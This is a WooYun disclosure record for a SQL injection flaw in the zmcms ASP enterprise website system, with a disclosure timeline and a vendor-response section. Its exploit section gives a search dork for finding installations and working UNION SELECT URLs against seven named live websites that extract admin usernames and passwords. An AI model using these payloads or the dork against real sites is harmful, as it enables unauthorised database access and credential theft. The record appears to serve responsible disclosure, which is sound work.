漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-070083
漏洞标题:某通用型企业网站管理系统sql注入
相关厂商:追梦企业网站管理系统
漏洞作者: roker
提交时间:2014-07-29 15:15
修复时间:2014-10-27 15:16
公开时间:2014-10-27 15:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-29: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经确认,细节仅向厂商公开
2014-08-02: 细节向第三方安全合作伙伴开放
2014-09-23: 细节向核心白帽子及相关领域专家公开
2014-10-03: 细节向普通白帽子公开
2014-10-13: 细节向实习白帽子公开
2014-10-27: 细节向公众公开
简要描述:
rt
详细说明:
追梦企业网站管理系统(zmcms)是由追梦工作室基于asp+access/mssql自主研发而成。我们致力于中小企业网站的搭建。根据现有企业的需求。开发适合企业的模块,让企业可以轻松搭建适合自己企业的网站,后台功能强大,管理便捷。代码简单易懂,适合二次开发。我们认为“简单就是美”,因此一直以来,追梦工作室在开发过程中无处不充分考虑用户的使用习惯,尽最大可能降低用户的使用门槛,让用户关注于内容维护本身,而不需要投入过多的时间来学习系统的使用技巧,在细节处下大工夫。..
看到 inc/about.asp
直接将id带入了sql语句,没有过滤。类似的文件在 inc文件夹下还有很多。
前台 about.asp
包含了进来。
exp
虽然漏洞挺简单的。但是用户量还是蛮多滴。。。
关键字 inurl:"product.asp?pone="
5个实例用以证明通用。
http://www.whhnt.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.qqlqq.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.sl138.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.it8088.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.hqgg.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
特殊例子。2的位置显示不出来的话 就用3来显示 需要mid
http://www.ykml.cn/about.asp?id=%201%20union%20select%201,2,username,4,5,6,7,8,9,10,11,12,13,14%20from%20admin
http://www.ykml.cn/about.asp?id=%201%20union%20select%201,2,mid(username,4,5),4,5,6,7,8,9,10,11,12,13,14%20from%20admin
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 roker@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:17
确认时间:2014-07-30 09:31
厂商回复:
CNVD未能通过公开渠道获知软件生产厂商联系方式,暂未涉及政府和重要部门案例,未列入处置流程,待厂商认领。
最新状态:
暂无